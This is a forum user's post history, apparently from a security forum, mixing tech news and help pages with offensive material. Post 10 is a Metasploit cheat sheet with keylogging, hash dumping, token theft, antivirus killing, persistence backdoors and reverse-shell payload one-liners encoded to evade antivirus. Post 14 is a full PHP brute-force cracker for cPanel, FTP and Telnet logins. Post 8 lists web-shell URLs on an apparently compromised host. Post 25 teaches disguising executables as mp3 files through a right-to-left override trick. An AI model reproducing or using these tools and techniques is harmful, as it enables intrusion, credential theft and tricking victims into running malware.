Fi8sVrs

Everything posted by Fi8sVrs

  1. Alphanumeric shellcode is similar to ASCII shellcode in that it is used to bypass character filters and evade intrusion detection during buffer overflow exploitation. This article documents alphanumeric code on multiple architectures, but primarily the 64 bit x86 architecture. Alphanumeric shellcode requires a basic understanding of bitwise math, assembly and shellcode. Contents: 1 Available x86_64 instructions 2 Alphanumeric opcode compatibility 2.1 Alphanumeric inter-compatible x86 opcodes 2.2 15 byte architecture detection shellcode 3 Alphanumeric x86_64 register value and data manipulation 3.1 Push: alphanumeric x86_64 registers 3.2 Pop: alphanumeric x86_64 registers 3.3 Prefixes 3.4 Operands 3.5 The rbx, rsp, and rbp registers 3.6 Xor 3.7 The rsi and rdi registers 3.8 Example: Zeroing Out x86_64 CPU Registers 4 64 bit shellcode: Conversion to alphanumeric code 4.1 bof.c 4.2 Starting shellcode (64-bit execve /bin/sh) 4.3 Shellcode Analysis 4.4 Stack Analysis 4.5 The Offset 4.6 The Syscall 4.7 Arguments 4.7.1 Stack Space 4.7.2 Register Initialization 4.7.3 String Argument 4.7.4 Final Registers 4.8 Final Code 4.9 Successful Overflow Test Download: http://dl.packetstormsecurity.net/papers/shellcode/alpha.pdf Alphanumeric Shellcode ≈ Packet Storm
  2. Today we are proud to launch a new Mozilla Webmaker app to the world. Meet Thimble, the new tool that makes it incredibly simple for anyone to create and share their own web pages and other projects in minutes. Thimble is webmaking made easy. It’s an intuitive visual editor that lets you write and edit HTML right in your browser, preview and correct your work, and then publish and share fully functional web pages with a single click. Thimble removes many of the barriers for novice users trying to learn code, and includes a series of starter projects and templates to help anyone get started quickly. Wired Webmonkey calls Thimble “one of the friendliest, easiest-to-use code editors we’ve seen.” We’re extremely excited about it, and it’s at the heart of Mozilla Webmaker’s mission to move people from using the web to making the web — and to create a more web literate planet. source: Introducing Thimble: webmaking made easy | The Mozilla Blog
  3. Autofill forms Tired of filling out web forms with the same information time and time again? The Autofill feature lets you complete forms with just one click. How to use Autofill Your address information is stored in Google Chrome. The first time you fill out a form, Google Chrome automatically saves the contact information that you enter, like your name, address, phone number, or email address, as an Autofill entry. You can store multiple addresses as separate entries. Credit card information can also be securely stored. The browser can save your credit card information, with your explicit permission. When you enter credit card information on a form, Google Chrome asks you at the top of the page whether you'd like to save the information. Click Save info if you'd like the credit card to be saved as an Autofill entry. It takes just one click to fill out a form. When you start filling out a form, the Autofill entries that match what you're typing appear in a menu. Select an entry to automatically complete the form with information from the entry. Google Chrome also saves the text you've typed in specific form fields. The next time you fill out the same field, text that you've typed in the past appears in a menu. Just select the text you want to use from the menu to insert it directly into the field. Preview a form before you fill it out. To see how Google Chrome will complete a form before it actually fills it out, hover over an Autofill entry in the menu with your mouse. The fields that can be automatically completed are highlighted in yellow. Manage your Autofill entries Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Click Manage Autofill settings. In the dialog that appears, you can create as many profiles as you'd like: To save a new address entry, scroll to the end of the "Addresses" section and click Add new street address. 
To save a new credit card entry, scroll to the end of the "Credit Cards" section and click Add new credit card. To edit an existing entry, double-click it in the list to open the editing dialog. To delete an existing entry, select it from the list and click the x that appears at the end of the row. If you're using a Mac, addresses from your Address Book are included as potential Autofill matches by default. If you'd prefer not to see those addresses, deselect the "Include addresses from my Address Book" checkbox. Delete your form data Delete all Autofill entries and saved text Click the wrench icon on the browser toolbar. Select Tools. Select Clear browsing data. In the dialog that appears, select the "Clear saved Autofill form data" checkbox. Use the menu on the top to select the amount of data you want to delete. Select the beginning of time to clear everything. Click Clear browsing data. Delete specific Autofill entries Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Click Manage Autofill settings. In the dialog that appears, select the entry you'd like to delete from the list. Click the x that appears at the end of the row. Delete specific saved text When you type in a form field, a menu may appear, containing past text that you've typed in the field. To delete a specific piece of saved text, select it in the menu using the arrows on your keyboard, then press Shift+Delete. Enable or disable Autofill Autofill is typically turned on by default. Follow the steps below to disable it. Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Deselect the "Enable Autofill to fill out web forms in a single click" checkbox. https://support.google.com/chrome/bin/answer.py?hl=en&answer=142893&p=settings_autofill
  4. FireSSH 0.90 by Mime Čuvalo. FireSSH is a free, cross-platform SSH terminal client for Mozilla Firefox. Written entirely in JavaScript! Download https://addons.mozilla.org/en-US/firefox/addon/firessh/
  5. Version 1.0 Author: Falko Timme <ft [at] falkotimme [dot] com> Last edited 10/24/2008 dmidecode is a tool for dumping a computer's DMI (some say SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision. Thanks to this table, you can retrieve this information without having to probe for the actual hardware. Take a look at man dmidecode to find out all options. The most common option is the --type switch which takes one or more of the following keywords: bios, system, baseboard, chassis, processor, memory, cache, connector, slot You can as well specify one or more of the following numbers: Each keyword is equivalent to a list of type numbers: Here are a few sample outputs from one of my servers: dmidecode --type bios dmidecode --type system dmidecode --type baseboard dmidecode --type chassis dmidecode --type processor dmidecode --type memory dmidecode --type cache dmidecode --type connector dmidecode --type slot http://www.howtoforge.com/dmidecode-finding-out-hardware-details-without-opening-the-computer-case
  6. This article explains how to monitor a Linux system's network interfaces. Install BMon using the following command: apt-get install bmon Now run “bmon” to see something similar to the following: When running, you can select the interface to monitor and press “g” to see an active graph. Network Bandwidth Monitoring With BMon | AGIX Linux
  7. Facebook buys Opera and launches its own web browser. If the latest rumors prove true, Facebook is about to acquire Opera Software, with the desktop and mobile versions of the web browser of the same name becoming the foundation for the first Facebook web browser, created specifically for followers of the social network. The Facebook browser would include Facebook plugin components and menus that enrich web browsing sessions with elements specific to the social network, such as recommending interesting pages on Facebook and posting images and comments. Apparently, the final goal is to promote the Facebook network from the status of a simple website that we visit to that of a web experience in which the social network's functions are permanently accessible, regardless of the website we are browsing. Given the popularity that Opera Mobile currently enjoys, its adaptation for the Facebook browser has a good chance of success, the result being a web browser even more attractive to the social network's 900 million followers. With the launch of its own web browser, Facebook will enter a two-front competition with Google, the owner of the Google+ network and of the Chrome web browser, which recently advanced to the status of most used web browser at the expense of Internet Explorer. If until now Google+ was advancing in small steps in the world of social networks, the Facebook browser will complicate things even further, forcing Google toward even more aggressive promotion strategies, such as integrating Google+ functions with the Chrome web browser. Source: Facebook buys Opera and launches its own web browser
  8. http://bestinternetwebhosting.com/kt/sym.php [+] Symlink script[+] http://bestinternetwebhosting.com/kt/bomba/ [+] Symlink dir[+] http://bestinternetwebhosting.com/kt/cgishell/itsecteam.php [+] shell /dir/ [+] http://bestinternetwebhosting.com/kt/sym.php?sws=sym [+] User & Domains & Symlink [+] via cr0wn at r00tworkm
  9. The passwords should be extracted from the logs you have, and a dictionary made of the most frequently used passwords.
  10. Meterpreter

      Process:
        getuid                          shows user id
        getpid                          shows meterpreter process id
        ps                              lists running processes
        migrate [ps]                    migrates to given process (one that won't end/crash)

      KeyLog: Ensure you are monitoring the correct session (Explorer.exe/WinLogin.exe)
        idletime                        shows how long machine has been idle for
        keyscan_start                   starts the key logger
        keyscan_dump                    outputs captured data
        keyscan_stop                    stops the keylogger

      Channels: This allows you to do more than one thing at a time in meterpreter
        execute -f cmd.exe -c           opens a new cmd.exe and creates a new channel for it
        channel -l                      lists the open channels
        read [channel]                  outputs data from channel
        interact [channel]              allows you to jump into the channel
        write [channel]                 sends data to the channel
        close [channel]                 kills the channel

      Session: Session0 is the local desktop. Session1+ are rdp sessions.
        enumdesktops                    shows currently open desktops such as winlogin etc
        getdesktop                      shows current desktop session meterpreter is in
        setdesktop                      changes to an already open desktop session
        uictl disable keyboard          disables the keyboard of the desktop session

      FileEdit: Ability to edit file attributes such as MACE
        timestomp file.txt -c "30/12/1980 12:12:34"    changes file stamp of file
        timestomp file.txt -f sourcefile.txt           copies timestamp from sourcefile.txt
        use priv                        to load the priv extras
        hashdump                        to dump the SAM file

      Tokens: Incognito allows token stealing and other token functions
        use incognito                   loads the incognito into meterpreter
        list_tokens -u                  shows stealable tokens
        impersonate_token               allows a token to be stolen
        steal_token [psid]              allows ability to steal token of a process
        rev2self                        reverts to original token
        run post/windows/gather/cachedump    gets cached domain hashes
          need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather

      Sniffer: Allows promiscuous mode to be enabled
        use sniffer                     loads the sniffer functions
        sniffer_interfaces              list interface 1,2,3,4,5,6,etc
        sniffer_start [n]               starts the sniffer for the interface
        sniffer_stats [n]               lists packets, time, etc..
        sniffer_dump [n] file.pcap      dumps the capture locally
        sniffer_stop                    you guessed it

      Meterpreter Scripts: These scripts perform various functions on the victim
        run checkvm                     checks if the target is a vm
        run credscollect                dumps hashes and tokens to screen
        run enum_firefox                dumps temp internet files from firefox – cookies, passwords, etc
        run get_application_list        shows installed applications
        run killav                      tries to stop all known AV progs
        run get_local_subnets           enumerates local subnet info
        run metsvc                      creates a backdoor
        run persistence                 survives a reboot (without admin or system)
        run scheduleme -e file.exe -m 30    you'll need to man load the meterpreter.exe payload
        run kitrap0d                    allows priv escalation using CVE-2010-0232

      web browser exploit
        use auxiliary/server/browser_autopwn
        set LHOST [local_ip]
        set SRVPORT 80
        set URIPATH /
        run
        #now get the client to connect to you (use ettercap dns)

      inbuilt sqlite db
        db_driver sqlite3               starts the db using sqlite (file based)
        db_connect job                  creates a new db called job and connects to it
        db_hosts                        shows hosts
        db_services                     shows visible services
        db_nmap -sS [target_ip]         performs nmap against target and stores in db
        db_import_nmap_xml              allows import
        db_autopwn -p -e -r -t          autoown from db vulns

      Meterpreter Payload Backdoor
        ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
        ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
          sets the payload as meterpreter and then encodes it 5 times to bypass AV
        ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
          #this fucker bypasses sophos
        ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E

      One Liners
        # One liner meterpreter reverse_tcp
        /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 X > /root/clear.exe
        # One liner shikata encoded meterpreter reverse_tcp
        /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe
        # One liner encoded and hidden in windows exe meterpreter reverse_tcp
        /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5

      Metasploit Notes | phillips321.co.uk
  11. So I’ve been using my bt5-nmap.sh script for a few years to quickly gather data whilst on a pentest. The main issue with the way this script worked was it was not easy to continue a session half way through or to modify the number of running threads. This new script uses dialog which comes as standard in bt5. Options: arpscan “run arp-scan to create targets.txt” nmap “nmap targets” amap “amap ports found using nmap” sslscan “sslscan targets” gwp “Take photo of web pages found?” snmpscans “Check for default SNMP community strings” snmpget “Get data from SNMP services using known strings” enum4linux “Run enum4linux against targets” smtp “connect to SMTP to check if they allow relaying of mail” uniscan “run uniscan against HTTP(s) ports” nfsscan “connect to nfs services and list contents” You can check out the code using the following svn command: svn checkout phillips321 - Revision 24: /trunk phillips321 or view the code on the googlecode page. Here are a few photos followed by a quick demo video… https://www.phillips321.co.uk/pentest-sh/
  12. Anubis Comodo GFI sandbox jsunpack Norman ThreatExpert Wepawet
  13. If you need to extract all the links / URLs from a Google search you can use the following commands: wget -q -U "Mozilla/5.001" -O - "http://www.google.com/search?q=inurl%3Aaftershell.com&num=100&start=200" | grep -o '<a href="http[^"]*"' | grep -v 'search?q=cache:' | grep -v '\.google\.' | sed 's/<a href="//;s/"$//' You can modify them to save the output or change the parameters for the languages (&hl= and &lr= ) and many more... AfterShell.com
  14. <?php $cpanel_port="2082"; $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['submit']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if($target == ""){ $target = "localhost"; } ?> <html> <head> <meta http-equiv="Content-Language" content="en-us"> </head> <title>Cpanel , FTP CraCkeR</title> <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000"> <div align="center"> <form method="POST" style="border: 1px solid #000000"> <img border="0" src="http://www.alm3refh.com/upload/group/groupxp.gif" width="426" height="169"><table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700"> <tr> <td> <p align="center"><b><font color="#008000" face="Tahoma" size="2"> <span lang="en-us">IP server</span> :</font><font face="Arial"> </font><font face="Arial" color="#CC0000"> <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px solid #1D1D1D; background-color: #000000; color:#008000; font-family:Verdana; font-weight:bold; font-size:13px"></font></b></p> <p align="center"><b><font color="#008000" face="Tahoma" size="2"> </font></b></p> <div align="center"> <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700"> <tr> <td align="center"> <span lang="en-us"><font color="#FF0000"><b>User List</b></font></span></td> <td> <p align="center"> <span lang="en-us"><font color="#FF0000"><b>Password List</b></font></span></td> </tr> </table> <p align="center"> <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?> </textarea><textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br> <br> <font style="font-weight:700" size="2" face="Tahoma" color="#008000"> <span lang="ar-sa">Guess options</span></font><font 
style="font-size: 12pt;" size="-3" face="Verdana"><span style="font-size: 9pt;"> <font face="Tahoma"> <input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio"></font></span></font><b><font size="2" face="Tahoma"> Cpanel</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b><font size="2" face="Tahoma"><b> </b> </font> <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio"></font></span></font><b><font size="2" face="Tahoma"> Telnet</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (23)</font></b><font size="2" face="Tahoma"><b> </b> </font> <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="ftp" style="font-weight: 700;" type="radio"></font></span></font><font style="font-weight: 700;" size="2" face="Tahoma"> </font><span style="font-weight: 700;"> <font size="2" face="Tahoma">Ftp </font> <font size="2" color="#FFFFFF" face="Tahoma"> (21)</font></span> <br> <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Timeout delay</span> <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>"></input> </p> <p align="center"> <input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p> </td> </tr> </table> <p align="center"></td> </tr> </form> <?php function ftp_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); 
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";exit; } else if ( curl_errno($ch) == 0 ) { print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } function cpanel_check($host,$user,$pass,$timeout) { global $cpanel_port; $ch = curl_init(); //echo "http://$host:".$cpanel_port."<br>"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . 
$cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";exit;} else if ( curl_errno($ch) == 0 ){ print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)) { print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; } if(empty($users)){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; } if(empty($pass) ){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . 
.</b></font></p>"; exit; }; $userlist=explode("\n",$users); $passlist=explode("\n",$pass); print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\"> Cracking Process Started, Please Wait ...</font></b><br><br>"; if(isset($_POST['connect_timeout'])) { $connect_timeout=$_POST['connect_timeout']; } if($cracktype == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($target,$pureuser,$purepass,$connect_tim eout); } } } if ($cracktype == "cpanel" || $cracktype == "cpanel2") { if($cracktype == "cpanel2") { $cpanel_port="23"; } else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0800\"> Processing user $pureuser ...</font></b><br><br>"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($target,$pureuser,$purepass,$connect_ timeout); } } } } ?> <p align="center"><b><a href="http://www.alm3refh.com/vb"> <span style="text-decoration: none">Sunni</span></a></b></p> <form style="border: 0px ridge #FFFFFF"> <p align="center"></td> </tr><div align="center"> <tr> <input type="submit" name="user" value="user"><option value="name"></select> </form> <div align="center"> <table border="1" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="1"> <tr> <td bordercolorlight="#008000" bordercolordark="#006A00"> <p align="left"> <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="25" name="S1" cols="22"> <?php if (isset($_GET['user'])) system('ls /var/mail'); if (isset($_POST['grab_users1'])) //grab users from /etc/passwd { $lines=file("/etc/passwd"); foreach($lines as $nr=>$val) { $str=explode(":",$val); echo $str[0]."\n"; } } 
if (isset($_POST['grab_users2'])) { $dir = "/home/"; if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { echo $file. "\n"; } closedir($dh); } } for($uid=0;$uid<90000;$uid++) { } ?></textarea> <table> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users1"></input> <input type=submit value="Grab Usernames from /etc/passwd"></input> </form> </tr> <br> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users2"></input> <input type=submit value="Grab Usernames from /home/"></input> </form> </tr> <br> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users3"></input> <input type=submit value="Grab Usernames from /home/ II"></input> </form> </tr> </form> </table> <?php if (isset($_POST['grab_users3'])) { error_reporting(0); $dir = "/home/"; if ($dh = opendir($dir)) { $f = readdir($dh);$f = readdir($dh); while (($f = readdir($dh)) !== false) { //echo $f. "\n"; $f.="/"; $dh2=opendir($dir.$f); $f2 = readdir($dh2);$f2 = readdir($dh2); while (($f2 = readdir($dh2)) !== false) { //echo $f2. "\n"; $f2.="/"; $dh3=opendir($dir.$f.$f2); $f3 = readdir($dh3);$f3 = readdir($dh3); while (($f3 = readdir($dh3)) !== false) { echo $f3. "<br>"; } } } closedir($dh); } } ?> source: r00tw0rm
  15. SeciTc 5th International Conference on Security for Information Technology and Communications June 2012, Bucharest Romania Conference areas: Cryptographic Algorithms and Protocols Security Technologies for IT&C Information Security Management Conference papers: will be published in the printed volume of the Conference Proceedings Selected papers from the conference will be considered for publication in the supporting journals. Journal of Mobile, Embedded and Distributed Systems Journal of Applied Quantitative Methods Printed volume with ISBN 5th International Conference on Security for Information Technology and Communications edit: there was a program
  16. Specify the source you took it from.
  17. http://www.youtube.com/watch?v=3mch44il4QE Description: Fimap is a python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. from: securitytube.net
  18. Online tool for creating .htaccess files: [en] .htaccess Editor root@KinG-InFeT ~ $_
  19. This archive contains all of the 251 exploits added to Packet Storm in May, 2012.
-a--- 5/29/2012 1:55 AM 1516 winradius-dos.txt -a--- 5/23/2012 5:45 AM 15808 winxpkeyboard.zip -a--- 5/24/2012 6:15 PM 1816 wiresharkdiameter-dos.tgz -a--- 5/24/2012 6:12 PM 3289 wiresharkdis-dos.tgz -a--- 5/24/2012 5:53 PM 536 wiresharkmisalign-dos.tgz -a--- 5/31/2012 2:51 AM 3750 wmsvaio-overflow.txt -a--- 5/6/2012 4:46 AM 1010 wordpress322-xss.txt -a--- 5/11/2012 5:26 AM 6023 wp2click-xss.txt -a--- 5/15/2012 6:09 AM 881 wp2clicksocialmedia-xss.txt -a--- 5/11/2012 5:34 AM 25581 wpbadbehavior-xss.txt -a--- 5/11/2012 5:31 AM 6587 wpbetterwp-xss.txt -a--- 5/11/2012 5:32 AM 7078 wpbulletproof-xss.txt -a--- 5/15/2012 6:08 AM 1024 wpcatablog-xss.txt -a--- 5/15/2012 6:05 AM 686 wpcodestyling-xss.txt -a--- 5/11/2012 5:29 AM 12032 wpcustomcontacts-xss.txt -a--- 5/15/2012 6:02 AM 786 wpdownloadmanager-xss.txt -a--- 5/15/2012 6:00 AM 960 wpdownloadmonitor-xss.txt -a--- 5/15/2012 5:59 AM 668 wpdynamicwidgets-xss.txt -a--- 5/15/2012 5:09 AM 685 wpeasygallery-xss.txt -a--- 5/15/2012 5:58 AM 684 wpezpzoneclickbackup-xss.txt -a--- 5/13/2012 6:22 PM 1113 wpfacethumb-xss.txt -a--- 5/15/2012 5:54 AM 1340 wpforumserver-sqlxss.txt -a--- 5/15/2012 5:53 AM 814 wpgdstarrating-xss.txt -a--- 5/15/2012 5:57 AM 771 wpgrandflashalbumgallery-xss.txt -a--- 5/15/2012 5:52 AM 718 wpiframeadminpages-xss.txt -a--- 5/15/2012 5:49 AM 763 wpleaflet-xss.txt -a--- 5/15/2012 5:46 AM 841 wpleaguemanager-xss.txt -a--- 5/15/2012 5:45 AM 818 wpmediacategories-xss.txt -a--- 5/15/2012 5:44 AM 1089 wpmingleforum-xss.txt -a--- 5/15/2012 5:43 AM 689 wpnetworkpublisher-xss.txt -a--- 5/15/2012 5:42 AM 1552 wpnewslettermanager-xss.txt -a--- 5/15/2012 5:51 AM 838 wppdfprintbutton-xss.txt -a--- 5/15/2012 5:40 AM 1333 wpprettylinklite-sqlxss.txt -a--- 5/15/2012 5:19 AM 761 wpshareandfollow-xss.txt -a--- 5/15/2012 5:18 AM 821 wpsharebar-sqlxss.txt -a--- 5/15/2012 5:17 AM 913 wpsoundcloud-xss.txt -a--- 5/15/2012 5:06 AM 804 wpstatistics-xss.txt -a--- 5/15/2012 5:16 AM 1028 wpsubscribe2-xss.txt -a--- 5/15/2012 5:03 AM 
1347 wpsurveyquiztool-xss.txt -a--- 5/15/2012 9:00 PM 711 wptrackthatstat-xss.txt -a--- 5/15/2012 5:00 AM 1542 wpzingiriwebshop235-xss.txt -a--- 5/9/2012 8:22 PM 1030 x7chat-xsrf.txt -a--- 5/29/2012 1:57 AM 4182 yamamah-disclose.txt -a--- 5/22/2012 6:38 AM 851 yandex-xss.txt -a--- 5/23/2012 6:22 PM 869 ydframework-disclose.txt -a--- 5/3/2012 12:41 AM 7231 ZSL-2012-5086.txt -a--- 5/9/2012 5:08 AM 1081 ZSL-2012-5087.txt -a--- 5/17/2012 2:42 AM 1393 ZSL-2012-5088.txt -a--- 5/17/2012 3:10 AM 1063 ZSL-2012-5089.txt -a--- 5/17/2012 3:17 AM 3110 ZSL-2012-5090.txt -a--- 5/17/2012 3:19 AM 2751 ZSL-2012-5091.txt Download Packet Storm New Exploits For May, 2012 ? Packet Storm
  20. Want to work but have nowhere to do it? Here you go: https://rstcenter.com/forum/53480-youve-got-money.rst
  21. Sudeep Singh, 5/21/2012

    Table of Contents

    Preface
    Advanced Hash Cracking
    Cryptographic Hash Properties
    Hash to the Stash
    Oclhashcat – An insight
    The need for Stronger Hashes
    Fast vs Slow Hashes
    How much Salt?
    How Many Iterations?
    John The Ripper (JTR) – Tweak That Attack!
    JTR POT Analyzer
    Word Mangling Rules
    GPU Vs CPU
    Conclusion
    References

    http://dl.packetstormsecurity.net/papers/general/advanced-crack.pdf
  22. The United Nations will meet in Dubai this December to make a decision that could carry significant consequences for the future of all web users: Should the UN be granted more control over the Internet?

    With the high-profile meeting looming at the end of this year’s calendar, key members of the U.S. government and private sector firms will meet with lawmakers Thursday to argue that the U.S. should work to defeat the proposal, which they consider a dangerous breach of existing norms.

    Currently, the Internet is regulated in what’s called a “multi-stakeholder” model, with various private and public organizations each playing specific roles in keeping its wheels spinning. Change that setup, argues the panel, and you put at risk the entire structure of the Internet.

    “A top-down, centralized, international regulatory overlay is antithetical to the architecture of the Net, which is a global network of networks without borders,” wrote FCC Commissioner and panel member Robert McDowell in the Wall Street Journal. “No government, let alone an intergovernmental body, can make engineering and economic decisions in lightning-fast Internet time.”

    Countries in favor of the plan, such as Russia and China, have argued that the organizations currently charged with oversight of the Internet, such as the Internet Corporation for Assigned Names and Numbers, or ICANN, are too closely tied to the United States. Moving Internet regulatory authority to the UN, they argue, would democratize control over it.

    However, some Internet privacy experts are concerned that giving censorship-heavy nations such as China more say in Internet regulation would have disastrous consequences for online free speech.

    “Maybe it bothers you that the U.S. controls these major keys to the Internet, but I think it’s a good thing,” wrote Larry Seltzer for Byte. “Without control of these critical facilities, no international group of dictators can really exert much control outside of their own boundaries.”

    Included in the panel will be Ambassador Philip Verveer, Deputy Assistant Secretary of State and U.S. Coordinator for International Communications and Information Policy; FCC Commissioner Robert McDowell; Ambassador David A. Gross, Former U.S. Coordinator for International Communications and Information Policy; Sally Shipman Wentworth, Senior Manager of Public Policy at the Internet Society; and Vinton Cerf, Vice President and Chief Internet Evangelist at Google.

    The House subcommittee panel will be broadcast via the web at 10:15 a.m. ET on Thursday, May 31.

    Source
  23. Overview

    Part I: User Commands
    Part II: System Calls
    Part III: Library Functions
    Part IV: Special Files
    Part V: File Formats
    Part VI: Games
    Part VII: Miscellaneous
    Part VIII: Administration and Privileged Commands
    Part IX: Kernel Reference Guide

    Download
  24. Fi8sVrs

    Hello.

    https://rstcenter.com/forum/28420-interviu-bine-ati-venit.rst
  25. This is a useful tut I found, all credits go to Cuddle:

    This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! Normally, changing the extension to e.g. .mp3 will corrupt your file, but with this exploit your file will still be executable!

    1. I have my server.exe, but I want it to look like an mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end. Now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space).

    2. Now it's time to use the exploit! Open up the Character Map. Scroll down and find the "U+202E: Right-To-Left Override" character. Click "Select" and then "Copy".

    3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press Ctrl+V to paste). Then type "3pm" (without the " ") and press Enter. Now it should look like this:

    Done! Obviously you might want to change the icon to look like an mp3 before doing this.

    A short video can be found here: [MediaFire], [MultiUpload] (Watch in HD + Fullscreen)

